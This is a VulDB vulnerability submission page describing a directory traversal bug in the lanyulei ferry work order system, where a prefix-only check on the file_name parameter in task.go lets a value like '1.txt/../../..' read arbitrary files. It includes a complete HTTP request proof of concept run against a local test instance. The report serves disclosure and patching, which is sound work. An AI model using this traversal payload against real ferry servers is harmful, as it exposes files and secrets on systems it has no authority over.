提出 #50729: ferry work order system background arbitrary file reading情報

タイトル	ferry work order system background arbitrary file reading
説明	Hello, I sent an authorized arbitrary file to read in the ferry system File address: https://github.com/lanyulei/ferry/blob/master/apis/process/task.go Accept file_name from GET request in TaskDetails function Judgment as follows -------------------------------------------------------------------------------------------------------- fileName == "" \|\| strings.HasPrefix(fileName, ".") \|\| strings.HasPrefix(fileName, "/") \|\| strings.HasPrefix(fileName, "\\") //it only verifies the beginning ----------------------------------------------------------------------------------------------------------- Judgment, this cannot avoid the occurrence of loopholes We can copy file_name as ls.txt/../../anyfile At this time, the system will return the file content to cause arbitrary file read vulnerability Here is what I reproduced locally I use golang1.16.15 to build in windows environment ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /api/v1/details?file_name=1.txt/../../../../../../../../../../../../test.txt HTTP/1.1 Host: 127.0.0.1:8002 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://127.0.0.1:8002/ Accept-Encoding: gzip, deflate Cookie: Hm_lvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630; Hm_lpvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630 Connection: close ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- My test.txt file is in the root directory of the E drive, at this point I can read it project address：https://github.com/lanyulei/ferry Thanks for your review
ユーザー	qsec (UID 33968)
送信	2022年11月03日 09:33 (4 年 ago)
モデレーション	2022年11月11日 07:56 (8 days later)
ステータス	承諾済み
VulDBエントリ	213447 [lanyulei ferry apis/process/task.go file_name ディレクトリトラバーサル]
ポイント	17

◂ 前概要次 ▸

Do you need the next level of professionalism?

Upgrade your account now!